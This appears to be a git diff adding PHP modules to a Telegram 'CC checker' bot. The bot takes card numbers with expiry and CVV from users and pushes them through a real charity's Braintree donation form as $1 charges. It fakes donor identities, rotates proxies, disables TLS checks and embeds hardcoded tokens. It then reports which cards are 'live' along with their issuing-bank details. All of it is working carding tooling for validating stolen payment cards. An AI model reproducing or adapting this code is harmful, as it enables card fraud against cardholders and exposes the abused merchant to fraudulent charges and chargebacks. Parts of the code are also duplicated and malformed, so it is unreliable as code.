+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+$headers[] = 'x-animoto-accept: application/vnd.animoto-v4+json';
+$headers[] = 'x-animoto-authorization: Bearer c46cbe59776fb5ac7e6845f0a238fc4615236ac28c44eb3ac57706d3031ed7a9';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);;
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"purchase":{"address":{"country_code_alpha2":"US","first_name":"Lucas","last_name":"Noob","locality":"New York","postal_code":"90034","region":"New York","street_address":"Street 23"},"device_data":"{\"correlation_id\":\"151212a2841be8cf64371e883b95ff15\"}","nonce":"'.$token.'","price_id":2373,"plan_list_logical_id":"10","price_list_logical_id":"57","promotion_code":"","type":"braintree"}}');
+$curl2 = curl_exec($ch);
+$info = curl_getinfo($ch);
+$time = $info['total_time'];
+$time = substr_replace($time, '',4);
+//echo $curl2;
+//echo "Response: $curl2
";
+//echo "Bearer: $b3en
";
+//echo "Bearer Decoded : $finger
";
+if (isset($proxy)){
+ $ip = "Proxy live ✅";
+ }
+ if (empty($proxy)){
+ $ip = "Proxy Dead ❌";
+ }
+ //echo '['.$ip.']
';
+ curl_close($ch);
+######################END OF CHECKER PART################################################################################
+
+
+ if(strpos($curl2, 'Gateway Rejected: avs')) {
+ addTotal();
+ addUserTotal($userId);
+ addCVV();
+ addUserCVV($userId);
+ addCCN();
+ addUserCCN($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+Status -» CVV Matched [AVS Failure] ✅
+Response -» Approved (Gateway Rejected:AVS)
+Gateway -» Braintree Auth 1
+IP -» Proxy ($ip)
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(strpos($curl2, 'Insufficient Funds')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Credit Floor] ✅
+ Response -» Approved (Insufficient Funds)
+ Gateway -» Braintree Auth 1
+ IP -» Proxy ($ip)
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+ elseif(strpos($curl2, 'Card Issuer Declined CVV')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CCN Matched [CVV2 Failure] ✅
+ Response -» Approved (Card Issuer Declined:CVV)
+ Gateway -» Braintree Auth 1
+ IP -» Proxy ($ip)
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» $curl2
+ Gateway -» Braintree Auth 1
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/b3.php b/modules/checker/b3.php
new file mode 100644
index 0000000..434981c
--- /dev/null
+++ b/modules/checker/b3.php
@@ -0,0 +1,607 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mm = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $yyyy = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+//================[ User Randomization ]================//
+$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
+preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
+$first = $matches1[1][0];
+preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
+$last = $matches1[1][0];
+preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
+$street = $matches1[1][0];
+//Email
+preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
+$name = $matches1[1][0];
+preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
+$last = $matches1[1][0];
+
+#------[Email Generator]------#
+
+function emailGenerate($length = 10)
+{
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+}
+$email = emailGenerate();
+
+//
+preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
+$city = $matches1[1][0];
+preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
+$state = $matches1[1][0];
+preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
+$phone = $matches1[1][0];
+preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
+$postcode = $matches1[1][0];
+
+#------[Winscribe]------#
+
+$proxy = [
+ 'socks-us.windscribe.com:1080',
+ 'socks-nl.windscribe.com:1080',
+];
+
+#------[GET]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://lcc.lt/donate/donate-annual-fund');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: lcc.lt';
+$headers[] = 'method: GET';
+$headers[] = 'path: /donate/donate-annual-fund';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: document';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: none';
+$headers[] = 'sec-fetch-user: ?1';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get = curl_exec($ch);
+$xct1 = trim(strip_tags(getStr($get,'')));
+$xct = trim(strip_tags(getStr($xct1,'"','" />')));
+//echo $get;
+
+#------[GET-2]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://lcc.lt/!/MMBraintree/token?currency=usd');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: lcc.lt';
+$headers[] = 'method: GET';
+$headers[] = 'path: /!/MMBraintree/token?currency=usd';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'referer: https://lcc.lt/donate/donate-annual-fund';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36';
+$headers[] = 'x-csrf-token: '.$xct.'';
+$headers[] = 'x-request-from: AppFormDonate/services/BraintreeService.js';
+$headers[] = 'x-requested-with: XMLHttpRequest';
+$headers[] = 'x-xsrf-token: eyJpdiI6Im5Od1k2aTh6M0dmYkxwTVhUcEo5OXc9PSIsInZhbHVlIjoiZ1A4SGNQOTBMN290QlNEd2E3RGVDWEZWQ2RXUFM2OTlvSEZFSkhQSDYrQ0NneVN4d1M0cER6RUlSTmRpXC9lUitNaWxuckszMGxKUno2eU5KalFkWlRnPT0iLCJtYWMiOiIwNDFlZjVlYjVlYjM0YTg1N2JiZDVlZWFiZjkzYTc2Yzk1NDNmOGIzMWZiYWMzYjcyZTA0NWVlZGM4NDQwMWRlIn0=';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get2 = curl_exec($ch);
+
+//TRIMMING AUTH BEARER
+//$b3en = trim(strip_tags(getStr($get2, "braintreeToken : '", "',")));
+$b3de = base64_decode($get2);
+$finger = trim(strip_tags(getStr($b3de, '{"version":2,"authorizationFingerprint":"','","')));
+
+#------[CURL-1]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://lcc.lt/static_assets/donate/ico_donations_one_time_colour.svg');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: lcc.lt';
+$headers[] = 'method: GET';
+$headers[] = 'path: /static_assets/donate/ico_donations_one_time_colour.svg';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'referer: https://lcc.lt/donate/donate-annual-fund';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: image';
+$headers[] = 'sec-fetch-mode: no-cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get3 = curl_exec($ch);
+
+#------[CURL-2]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://lcc.lt/static_assets/donate/ico_donations_other.svg');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: lcc.lt';
+$headers[] = 'method: GET';
+$headers[] = 'path: /static_assets/donate/ico_donations_other.svg';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'referer: https://lcc.lt/donate/donate-annual-fund';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: image';
+$headers[] = 'sec-fetch-mode: no-cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get4 = curl_exec($ch);
+
+
+
+#------[CURL-3]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://payments.braintree-api.com/graphql');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'Accept: */*';
+$headers[] = 'Accept-Language: en-US,en;q=0.9';
+$headers[] = 'Authorization: Bearer '.$finger.'';
+$headers[] = 'Braintree-Version: 2018-05-10';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Content-Type: application/json';
+$headers[] = 'Host: payments.braintree-api.com';
+$headers[] = 'Origin: https://assets.braintreegateway.com';
+$headers[] = 'Referer: https://assets.braintreegateway.com/';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'Sec-Fetch-Dest: empty';
+$headers[] = 'Sec-Fetch-Mode: cors';
+$headers[] = 'Sec-Fetch-Site: cross-site';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"clientSdkMetadata":{"source":"client","integration":"custom","sessionId":"90b73150-b2b2-47a3-b560-cc61e1768c87"},"query":"query ClientConfiguration { clientConfiguration { analyticsUrl environment merchantId assetsUrl clientApiUrl creditCard { supportedCardBrands challenges threeDSecureEnabled } applePayWeb { countryCode currencyCode merchantIdentifier supportedCardBrands } googlePay { displayName supportedCardBrands environment googleAuthorization } ideal { routeId assetsUrl } kount { merchantId } masterpass { merchantCheckoutId supportedCardBrands } paypal { displayName clientId privacyUrl userAgreementUrl assetsUrl environment environmentNoNetwork unvettedMerchant braintreeClientId billingAgreementsEnabled merchantAccountId currencyCode payeeEmail } unionPay { merchantAccountId } usBankAccount { routeId plaidPublicKey } venmo { merchantId accessToken environment } visaCheckout { apiKey externalClientId supportedCardBrands } braintreeApi { accessToken url } supportedFeatures } }","operationName":"ClientConfiguration"}');
+$curl10 = curl_exec($ch);
+
+
+//==============[ 1st req ]==============//
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://payments.braintree-api.com/graphql');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'Accept: */*';
+$headers[] = 'Accept-Language: en-US,en;q=0.9';
+$headers[] = 'Authorization: Bearer '.$finger.'';
+$headers[] = 'Braintree-Version: 2018-05-10';
+$headers[] = 'Connection: keep-alive';
+$headers[] = 'Content-Type: application/json';
+$headers[] = 'Host: payments.braintree-api.com';
+$headers[] = 'Origin: https://assets.braintreegateway.com';
+$headers[] = 'Referer: https://assets.braintreegateway.com/';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'Sec-Fetch-Dest: empty';
+$headers[] = 'Sec-Fetch-Mode: cors';
+$headers[] = 'Sec-Fetch-Site: cross-site';
+$headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"clientSdkMetadata":{"source":"client","integration":"dropin2","sessionId":"90b73150-b2b2-47a3-b560-cc61e1768c87"},"query":"mutation TokenizeCreditCard($input: TokenizeCreditCardInput!) { tokenizeCreditCard(input: $input) { token creditCard { brandCode last4 binData { prepaid healthcare debit durbinRegulated commercial payroll issuingBank countryOfIssuance productId } } } }","variables":{"input":{"creditCard":{"number":"'.$cc.'","expirationMonth":"'.$mm.'","expirationYear":"'.$yyyy.'","cvv":"'.$cvv.'"},"options":{"validate":false}}},"operationName":"TokenizeCreditCard"}');
+$curl1 = curl_exec($ch);
+$token = trim(strip_tags(getStr($curl1,'"token":"','"')));
+curl_close($ch);
+//echo $curl1;
+
+//==============[ 2nd req ]==============//
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://lcc.lt/!/MMBraintree/sale');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: lcc.lt';
+$headers[] = 'method: POST';
+$headers[] = 'path: /!/MMBraintree/sale';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryt7ckHaE2ZI4uJwlE';
+$headers[] = 'origin: https://lcc.lt';
+$headers[] = 'referer: https://lcc.lt/donate/donate-annual-fund';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36';
+$headers[] = 'x-csrf-token: '.$xct.'';
+$headers[] = 'x-request-from: AppFormDonate/services/BraintreeService.js';
+$headers[] = 'x-requested-with: XMLHttpRequest';
+$headers[] = 'x-xsrf-token: eyJpdiI6Ik4zd2d3WHIya0U2TTZwaVpJUEx2ekE9PSIsInZhbHVlIjoiSTZ1Tkl3YXJ1XC90a2pIMCtxR3ZFVGRod1dMa29IREx1a2IyaUczazJKM2x5eVRDT1VkNFFJVEl6MXlJUitUY0dmOTE4Q3RtY0lRT0JrWnZkS2tqM2x3PT0iLCJtYWMiOiJiZGYwZWVlOWIxYmQ4YjE1YTU3YTE3Zjk4OGViM2VjMTQyOTU2NmRlNzk2YjIzZjBmY2RjOGFhMTRjZWVmNmI2In0=';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="lcc_payment_information"
+
+"Area of greatest need"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="first_name"
+
+"Levi"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="last_name"
+
+"Randi"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="country"
+
+"US"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="city"
+
+"New York"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="state"
+
+"New York"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="zip"
+
+"10080"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="street"
+
+"Street 23"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="phone"
+
+"4132331423"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="email"
+
+"'.$email.'"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="nonce"
+
+"'.$token.'"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="currency"
+
+"usd"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="amount"
+
+"1"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="lcc_payment_type"
+
+"donation"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="lcc_donation_title"
+
+"Annual Fund"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="lcc_donation_type"
+
+"annual"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="lcc_donation_period"
+
+"one_off"
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="anonymous"
+
+null
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE
+Content-Disposition: form-data; name="newsletter"
+
+null
+------WebKitFormBoundaryt7ckHaE2ZI4uJwlE--');
+$curl2 = curl_exec($ch);
+ $info = curl_getinfo($curl2);
+ $time = $info['total_time'];
+ $time = substr_replace($time, '',4);
+ curl_close($ch);
+
+######################END OF CHECKER PART################################################################################
+
+
+ if(strpos($curl2, 'Gateway Rejected: avs')) {
+ addTotal();
+ addUserTotal($userId);
+ addCVV();
+ addUserCVV($userId);
+ addCCN();
+ addUserCCN($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+Status -» CVV Matched [AVS Failure] ✅
+Response -» Approved (Gateway Rejected:AVS)
+Gateway -» Braintree Auth 1
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(strpos($curl2, 'Insufficient Funds')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Credit Floor] ✅
+ Response -» Approved (Insufficient Funds)
+ Gateway -» Braintree Auth 1
+ Time -» $times
